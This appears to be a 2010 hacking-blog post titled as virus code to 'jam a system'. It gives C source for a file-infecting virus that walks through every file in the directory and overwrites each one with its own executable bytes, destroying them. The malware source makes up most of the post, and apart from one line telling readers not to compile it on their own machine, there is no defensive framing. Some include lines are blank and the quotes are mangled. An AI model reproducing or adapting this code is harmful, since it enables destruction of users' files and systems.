VIRUS CODE IN “C” && “C++” to jam a system!!

Posted by ADMINISTRATOR On 31 January 2010 No Commented

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them.  But the virus infected file is also capable of spreading the infection to another file and so on.

Don’t compile in ur own machine.

#include
#include
#include
#include
#include
#include

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(”*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(”Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(”DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(”TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

Comments

comments

You May Also Like To Read:

  1. VIRUS WRITING : Extension Chainging virus
  2. Hack your forgotten unlock code
  3. New Orkut Virus : Bom Sabado (issue resolved!)
  4. Restore Task Manager, Regedit and Folder Options Disabled by Virus
  5. Remove Brontok Virus Urself
  6. Hack Rediff Bol Via Web Page (Source Code)
  7. Reset life timer and security code for all S60 V3
  8. How To Unlock Security Code Of S60 Device Using Memmory Card
  9. Unlock the Nokia mobile security code with IMEI Number
  10. Bar code Reader In Your Mobile Phones(Nokia and others).

Leave a Reply

 
Freelance PHP Developer
Stop SOPA